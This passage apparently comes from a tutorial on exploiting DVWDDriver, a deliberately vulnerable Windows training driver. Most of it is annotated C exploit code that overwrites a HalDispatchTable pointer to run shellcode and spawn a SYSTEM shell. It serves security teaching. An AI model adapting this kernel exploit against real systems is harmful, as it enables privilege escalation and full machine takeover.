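
    With an image mapped at 0x00400000 in userland, a symbol found at 0x0046E000 and a kernel base of 0x80800000, the symbol lives at 0x8086E000 in kernelland, and its second entry (the "where" of the overwrite) is at 0x8086E004.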
    A global overview is given in the following figure taken from [2]


      5. Exploit code

      Here is the exploit code developed by the authors of DVWDDriver. While reading it, I added many comments to make sure I understood everything it does. With the previous explanations, it should be quite easy to follow; nothing is very tricky here =)

      // ----------------------------------------------------------------------------
      // Arbitrary Memory Overwrite exploitation ------------------------------------
      // ---- HalDispatchTable pointer overwrite method -----------------------------
      // ----------------------------------------------------------------------------
      
      
      // Overwrite kernel dispatch table HalDispatchTable's second entry:
      //  - STORE the address of the shellcode (pointer in kernelland, points to userland)
      //  - OVERWRITE the second pointer in the HalDispatchTable with the address of the shellcode
      BOOL OverwriteHalDispatchTable(ULONG_PTR HalDispatchTableTarget, ULONG_PTR ShellcodeAddrStorage) {
      
       HANDLE hFile;
       BOOL ret;
       DWORD dwReturn;
       ARBITRARY_OVERWRITE_STRUCT overwrite;
      
       // Open handle to the driver
       hFile = CreateFile(L"\\\\.\\DVWD", 
              GENERIC_READ | GENERIC_WRITE, FILE_SHARE_WRITE | FILE_SHARE_READ | FILE_SHARE_DELETE, 
              NULL, 
              OPEN_EXISTING, 
              0, 
              NULL);
      
       if(hFile != INVALID_HANDLE_VALUE) {
       
        // DEVICEIO_DVWD_STORE
        // -> store the address of the shellcode into kernelland (GlobalOverwriteStruct) 
        overwrite.Size = 4;
        overwrite.StorePtr = (PVOID)&ShellcodeAddrStorage;
        ret = DeviceIoControl(hFile, DEVICEIO_DVWD_STORE, &overwrite, 0, NULL, 0, &dwReturn, NULL);
      
        // DEVICEIO_DVWD_OVERWRITE 
        // -> copy the content of the buffer in kernelland (the address previously added)
        // to the location HalDispatchTableTarget (second entry in the HalDispatchTable)
        overwrite.Size = 4;
        overwrite.StorePtr = (PVOID)HalDispatchTableTarget;
        ret = DeviceIoControl(hFile, DEVICEIO_DVWD_OVERWRITE, &overwrite, 0, NULL, 0, &dwReturn, NULL);
      
        CloseHandle(hFile);
        
        return TRUE;
       }
      
       return FALSE;  
      }
      
      
      
      typedef NTSTATUS (__stdcall *_NtQueryIntervalProfile)(DWORD ProfileSource, PULONG Interval);
      BOOL TriggerOverwrite32_NtQueryIntervalProfileWay() {
      
       ULONG dummy = 0;
       ULONG_PTR HalDispatchTableTarget;
       ULONG_PTR ShellcodeAddrStorage; 
      
       _NtQueryIntervalProfile NtQueryIntervalProfile;
      
       // Load the Kernel Executive ntoskrnl.exe in userland and get some symbol's kernel address
       if(LoadAndGetKernelBase() == FALSE) {
        return FALSE;
       }
      
       // Retrieve the address of the shellcode
       ShellcodeAddrStorage = (ULONG_PTR)UserShellcodeSIDListPatchUser4Args;
       
       // Retrieve the address of the second entry within the HalDispatchTable
       HalDispatchTableTarget = HalDispatchTable + sizeof(ULONG_PTR);
       
       // Retrieve the address of the syscall NtQueryIntervalProfile within ntdll.dll
       NtQueryIntervalProfile  = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtQueryIntervalProfile");
      
       // Overwrite the pointer in HalDispatchTable
       if(OverwriteHalDispatchTable(HalDispatchTableTarget, ShellcodeAddrStorage) == FALSE) {
        return FALSE;
       }
      
       // Call the function in order to launch our shellcode
       // kd> u nt!KeQueryIntervalProfile
       NtQueryIntervalProfile(2, &dummy);
      
       if (CreateChild(_T("C:\\WINDOWS\\SYSTEM32\\CMD.EXE")) != TRUE) {
        wprintf(L"Error: unable to spawn process, Error: %d\n", GetLastError());
        return FALSE;
       }
      
       return TRUE;
      }
      

      6. w00t ?

      It's time to try the exploit:
      DVWDExploit.exe --exploit-overwrite-profile-32


      Yeah !! we spawn a shell cmd.exe that is running with NT AUTHORITY\SYSTEM privileges. w00t =)


      References

      [1] SSDT Uninformed article
      http://uninformed.org/index.cgi?v=8&a=2&p=10

      [2] Exploiting Common Flaws in Drivers, by Ruben Santamarta
      http://reversemode.com/index.php?option=com_content&task=view&id=38&Itemid=1

      [3] NtQueryIntervalProfile(),
      http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/NT%20Objects/Profile/NtQueryIntervalProfile.html

      [4] Windows Internals, book by Mark Russinovich & David Solomon